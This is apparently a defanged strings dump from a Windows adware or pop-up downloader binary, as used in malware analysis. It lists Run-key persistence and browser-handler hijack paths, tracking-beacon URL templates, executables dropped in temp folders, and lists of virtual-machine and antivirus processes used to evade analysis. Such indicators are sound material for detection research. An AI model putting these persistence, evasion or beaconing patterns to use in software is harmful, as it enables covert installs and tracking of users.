src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Not a valid registry key
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
HKEY_CURRENT_USER\Software\%s
day%d
HKEY_USERS\%s\Software\%s
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
..\..\Src\Common\EncryptFile.cpp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
%s[%d]
.d
http\shell\open\command
%s /autostart
..\..\Src\Common\CommUtils.cpp
%s[%d]:%s
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
user32.dll
ntdll.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
?h=X-X-X-X-X-X&r=%s_%s&t=%s&typeid=%d&status=%d&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&t=%s&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&onlinetime=%d --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=0
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&Failstate=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0&PreCheck=1
?h=X-X-X-X-X-X&r=%s_%s&d=%s&time=%d&first=%d
url=%s
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
G:\pz_git\vendor\inc\Poco/String.h
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d / %d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
kernel32.dll
X:X:X:X:X:X
cmd.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
X-X-X-X-X-X
%d.%d.%d.%d
Removing %s.
..\..\Src\Download\HttpDownload.cpp
_unlink: %s
No URLs found in %s.
Download quota (%s bytes) EXCEEDED!
FINISHED --%s--
Downloaded: %s bytes in %d files
Converted %d files in %.2f seconds.
Converting %s...
Unable to delete `%s': %s
Cannot convert links in %s: %s
%d-%d
Cannot back up %s as %s: %s
.orig
/index.html
%d; URL=%s
%s: %s: Not enough memory.
d:d:d
utime(%s): %s
d-d-d d:d:d
Failed to _unlink symlink `%s': %s
Get %.0f%% [%d/%d]
%.2f %s
%7.2f %s
Error parsing proxy URL %s: %s.
%s: %s.
Error in proxy URL %s: Must be HTTP.
%d redirections exceeded.
unlink: %s
%s.%d
ftp_proxy
http_proxy
..\..\Src\Download\DownLoadTask.cpp
Syntax error in Set-Cookie: %s at position %d.
Error in Set-Cookie, field `%s'
Cookie coming from %s attempted to set domain to %s
Cannot open cookies file `%s': %s
# Generated by Wget on %s.
# HTTP cookie file.
Error writing to `%s': %s
Error closing `%s': %s
PTF://
hXXp://%s
PTF://%s
Unsupported scheme
Bad port number
IPv6 addresses not supported
%s: %s
d\
index.html
*password*
%s: WGETRC points to %s, which doesn't exist.
%swget.ini
%s: Error in %s at line %d.
%s: Cannot read %s (%s).
%s: Invalid --execute command `%s'
%s: %s: Invalid boolean `%s', use `on' or `off'.
%s: %s: Invalid boolean `%s', use always, on, off, or never.
%s: %s: Invalid number `%s'.
%s: %s: Invalid byte value `%s'
%s: %s: Invalid time period `%s'
%s: %s: Invalid header `%s'.
HTTP/
Reusing connection to %s:%hu.
Referer: %s
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
POST data file missing: %s
Content-Type: application/x-www-form-urlencoded
Failed writing HTTP request: %s.
%s request sent, awaiting response...
%s %s HTTP/1.0
User-Agent: %s
Host: %s%s%s%s
Accept: %s
%s%s%s%s%s%s%s%s%s%s
Read error (%s) in headers.
- %s
http-equiv=
Location: %s%s
.html
Refusing to truncate existing file `%s'.
(%s to go)
Warning: wildcards not supported in HTTP.
File `%s' already there, will not retrieve.
(try:-)
--%s-- %s
%s => `%s'
Cannot write to `%s' (%s).
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
Server file no newer than local file `%s' -- not retrieving.
%s (%s) - `%s' saved [%ld/%ld]
%d %s
%s (%s) - `%s' saved [%ld]
%s URL:%s [%ld/%ld] -> "%s" [%d]
%s (%s) - Connection closed at byte %ld.
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Read error at byte %ld (%s).
%s (%s) - Connection closed at byte %ld/%ld.
%a, %d %b %Y %T
%s (%s) - Read error at byte %ld/%ld (%s).
%a, %d-%b-%Y %T
%A, %d-%b-%y %T
%s:%s
%a %b %d %T %Y
%s: Basic %s
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
Removing %s since it should be rejected.
http-equiv
%s: Cannot resolve incomplete link %s.
%s: Invalid URL %s: %s
%a %b %e %H:%M:%S %Y
%Y-%m-%d
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Resolving %s...
Found %s in g_host_name_addresses_map (%p)
failed: %s.
Wget [%.0f%%] %s
Wget %s%s
Starting WinHelp %s
%s%s.HLP
SetThreadExecutionState
Unable to convert `%s' to a bind address. Reverting to ANY.
Connecting to %s:%hu...
Connecting to %s[%s]:%hu...
Logging in as %s ...
%s@%s
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
==> SIZE %s ...
couldn't connect to %s:%hu: %s
==> PORT ...
socket: %s
Bind error (%s).
Invalid PORT.
REST failed; will not truncate `%s'.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
[%s to go]
Length: %s
%s (%s) - Data connection: %s;
%s: %s, closing control connection.
%s (%s) -
File `%s' already there, not retrieving.
%s URL: %s [%ld] -> "%s" [%d]
.listing
Removed `%s'.
Skipping directory `%s'.
Remote file no newer than local file `%s' -- not retrieving.
Symlinks not supported, skipping symlink `%s'.
%s: corrupt time-stamp.
Remote file is newer than local file `%s' -- retrieving.
%s: unknown/unsupported file type.
%s/%s
Not descending to `%s' as it is excluded/not-included.
Rejecting `%s'.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s'.
Wrote HTML-ized index to `%s' [%ld].
%*s[ skipping %dK ]
=%%
Invalid dot style specification `%s'; leaving unchanged.
-%%
%7.2f%s
ETA %d:d:d
ETA d:d
.netrc
login
password
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
Cannot open %s: %s
/robots.txt
Loading robots.txt; please ignore errors.
--> %s
--> PASS Turtle Power!
%s%s%s
331 opiekey
331 s/key
%d,%d,%d,%d,%d,%d
PORT
WINDOWS_NT
Unsupported listing type, trying Unix listing parser.
%s%s%s@
Index of /%s on %s:%d
%d %s d
d:d
<a href="PTF://%s%s:%hu
-> %s
(%s bytes)
G:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
G:\pz_git\vendor\inc\Poco/ScopedLock.h
G:\pz_git\vendor\inc\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
G:\pz_git\bin\PopWnd.pdb
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
GetProcessHeap
CreatePipe
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
IPHLPAPI.DLL
WS2_32.dll
VERSION.dll
GdiplusShutdown
gdiplus.dll
MSIMG32.dll
IMM32.dll
dbghelp.dll
GetCPInfo
PeekNamedPipe
RegQueryInfoKeyA
1.2.5
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWL
FRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICK
NILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVPipeImpl@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVCXEventMsg@@
.?AVCXWebBrowser@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe
36.179]:80...
=> `C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26412\popwndup.exe'
17:40:24
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
(%d),XC_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON,ID(%d),bShow(%d)
(%d),XC_RADIO,ID(%d),bShow(%d)
(%d),XC_CHECK,ID(%d),bShow(%d)
(%d),XC_EDIT,ID(%d),bShow(%d)
(%d),XC_RICHEDIT,ID(%d),bShow(%d)
(%d),XC_COMBOBOX,ID(%d),bShow(%d)
(%d),XC_SCROLLBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)
(%d),XC_LIST,ID(%d),bShow(%d)
(%d),XC_LISTBOX,ID(%d),bShow(%d)
(%d),XC_TREE,ID(%d),bShow(%d)
(%d),XC_MENUBAR,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)
(%d),XC_SLIDERBAR,ID(%d),bShow(%d)
(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)
(%d),XC_TOOLBAR,ID(%d),bShow(%d)
(%d),XC_STATIC,ID(%d),bShow(%d)
(%d),XC_GROUPBOX,ID(%d),bShow(%d)
(%d),XC_PICTURE,ID(%d),bShow(%d)
(%d),XC_MONTHCAL,ID(%d),bShow(%d)
(%d),XC_DATETIME,ID(%d),bShow(%d)
(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)
(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)
(%d),XC_OUTLOOK,ID(%d),bShow(%d)
(%d),XC_TEXTLINK,ID(%d),bShow(%d)
(%d),XC_TABBAR,ID(%d),bShow(%d)
(%d),XC_GIF,ID(%d),bShow(%d)
(%d),XC_EDITFILE,ID(%d),bShow(%d)
(%d),XC_LISTVIEW,ID(%d),bShow(%d)
(%d),XC_PANE,ID(%d),bShow(%d)
(%d),XC_DRAGBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)
(%d),XC_CAPTION,ID(%d),bShow(%d)
(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)
(%d),XC_PIER,ID(%d),bShow(%d)
(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)
(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)
(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)
(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)
(%d),XC_TREE_SUPER,ID(%d),bShow(%d)
left:%d , top:%d , right:%d , bottom:%d
title=%s
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
portuguese-brazilian
USER32.DLL
n.exe
combase.dll
advapi32.dll
hXXp://xiaobingdou.com/online.aspx
hXXp://pop.yeaplayer.com/click.aspx
res://ieframe.dll/navcancl.htm#
iframe.htm
hXXp://VVV.googleadservices.com
hXXp://googleads.g.doubleclick.net
webad.xml
hXXp://xiaobingdou.com/anzhuang.aspx
bhXXp://xiaobingdou.com/jihuo.aspx
%d, %s
delete%s
%d,%s
hXXp://xiaobingdou.com/jihuo.aspx
"%s" %s
32:HKEY_CURRENT_USER\Software\%s\actv;64:HKEY_CURRENT_USER\Software\%s\actv
HKEY_CURRENT_USER\Software\%s\actv
%spopnew.xml
dhXXp://pop.yeaplayer.com/get.aspx
bhXXp://click_pop_exit_btn.com2
%s...
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
Firefox
opera
Chrome
twchrome
360chrome
User-Agent:Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent:Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11
User-Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
sUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
YeapUserInfo.ini
swapfile.ini
d\
GOOGLE CHROME
WebOptimum
9996655
EXPLORER.EXE
setup.exe
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
hXXp://1212.ip138.com/ic.asp
hXXp://VVV.ip-adress.com/
/iplookup/iplookup.php
hXXp://int.dpool.sina.com.cn
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada
TEST%d
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?ip=
hXXp://ip138.com/ips138.asp?ip=
hXXp://cdn3.optimizely.com/js/geo2.js
hXXp://software77.net/geo-ip/
config.yeadesktop.com
down.yeadesktop.com
Download failed:%d
cmd /C %s
ndddddd
Mddddd
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
BavSvc.exe
rstray.exe
SSScheduler.exe
ccSvcHst.exe
